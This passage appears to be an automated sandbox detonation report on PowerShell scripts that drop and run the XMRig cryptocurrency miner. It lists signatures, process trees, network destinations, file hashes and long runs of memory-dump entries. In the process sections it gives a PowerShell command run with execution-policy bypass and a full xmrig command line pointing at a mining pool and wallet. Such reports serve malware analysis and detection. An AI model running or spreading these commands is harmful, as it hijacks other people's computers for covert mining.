memory/1336-86-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-87-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-88-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-89-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-90-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-91-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-92-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-93-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-94-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-95-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-96-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-97-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-98-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-99-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-100-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-101-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-102-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-103-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-104-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-105-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-106-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-107-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-108-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-109-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-110-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-111-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-112-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-113-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-114-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-115-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-116-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-117-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-118-0x00007FF683910000-0x00007FF684543000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:38
Platform
win10v2004-20240226-en
Max time kernel
1797s
Max time network
1803s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 636 wrote to memory of 540 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 636 wrote to memory of 540 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3704 --field-trial-handle=2252,i,16022092570067181109,3235558581947505669,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1392 --field-trial-handle=2252,i,16022092570067181109,3235558581947505669,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 216.58.213.10:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 10.213.58.216.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 56.94.73.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| BE | 2.21.17.194:80 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.17.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.32.209.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.190.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.17.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
memory/636-0-0x00007FFAE92C3000-0x00007FFAE92C5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zdv4l4xg.rtr.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/636-10-0x000001EA79080000-0x000001EA790A2000-memory.dmp
memory/636-11-0x00007FFAE92C0000-0x00007FFAE9D81000-memory.dmp
memory/636-12-0x00007FFAE92C0000-0x00007FFAE9D81000-memory.dmp
memory/636-13-0x00007FFAE92C0000-0x00007FFAE9D81000-memory.dmp
memory/636-15-0x000001EA79490000-0x000001EA794A2000-memory.dmp
memory/636-16-0x000001EA790F0000-0x000001EA790FA000-memory.dmp
memory/636-17-0x00007FFAE92C3000-0x00007FFAE92C5000-memory.dmp
memory/636-18-0x00007FFAE92C0000-0x00007FFAE9D81000-memory.dmp
memory/636-42-0x00007FFAE92C0000-0x00007FFAE9D81000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/540-50-0x000001FE413C0000-0x000001FE413E0000-memory.dmp
memory/540-52-0x000001FE41620000-0x000001FE41640000-memory.dmp
memory/636-51-0x00007FFAE92C0000-0x00007FFAE9D81000-memory.dmp
memory/540-53-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-54-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-55-0x000001FE41640000-0x000001FE41660000-memory.dmp
memory/540-56-0x000001FE41660000-0x000001FE41680000-memory.dmp
memory/540-57-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-58-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-59-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-61-0x000001FE41660000-0x000001FE41680000-memory.dmp
memory/540-60-0x000001FE41640000-0x000001FE41660000-memory.dmp
memory/540-62-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-63-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-64-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-65-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-66-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-67-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-68-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-69-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-70-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-71-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-72-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-73-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-74-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-75-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-76-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-77-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-78-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-79-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-80-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-81-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-82-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-83-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-84-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-85-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-86-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-87-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-88-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-89-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-90-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-91-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-92-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-93-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-94-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-95-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-96-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-97-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-98-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-99-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-100-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-101-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-102-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-103-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-104-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-105-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-106-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-107-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-108-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-109-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-110-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-111-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-112-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-113-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-114-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-115-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-116-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-117-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-118-0x00007FF681840000-0x00007FF682473000-memory.dmp
memory/540-119-0x00007FF681840000-0x00007FF682473000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:40
Platform
win10-20240404-en
Max time kernel
1790s
Max time network
1771s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1276 wrote to memory of 4584 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1276 wrote to memory of 4584 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
Files
memory/1276-2-0x00007FFE42B03000-0x00007FFE42B04000-memory.dmp
memory/1276-5-0x00000216C1950000-0x00000216C1972000-memory.dmp
memory/1276-6-0x00007FFE42B00000-0x00007FFE434EC000-memory.dmp
memory/1276-9-0x00007FFE42B00000-0x00007FFE434EC000-memory.dmp
memory/1276-10-0x00000216C1B00000-0x00000216C1B76000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qqohxltb.fum.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1276-25-0x00007FFE42B00000-0x00007FFE434EC000-memory.dmp
memory/1276-48-0x00000216C1C80000-0x00000216C1C92000-memory.dmp
memory/1276-61-0x00000216C1AE0000-0x00000216C1AEA000-memory.dmp
memory/1276-62-0x00007FFE42B03000-0x00007FFE42B04000-memory.dmp
memory/1276-63-0x00007FFE42B00000-0x00007FFE434EC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4584-92-0x0000027A575C0000-0x0000027A575E0000-memory.dmp
memory/1276-93-0x00007FFE42B00000-0x00007FFE434EC000-memory.dmp
memory/1276-95-0x00007FFE42B00000-0x00007FFE434EC000-memory.dmp
memory/4584-94-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-96-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-97-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-98-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-99-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-100-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-101-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-102-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-103-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-104-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-105-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-106-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-107-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-108-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-109-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-110-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-111-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-112-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-113-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-114-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-115-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-116-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-117-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-118-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-119-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-120-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-121-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-122-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-123-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-124-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-125-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-126-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-127-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-128-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-129-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-130-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-131-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-132-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-133-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-134-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-135-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-136-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-137-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-138-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-139-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-140-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-141-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-142-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-143-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
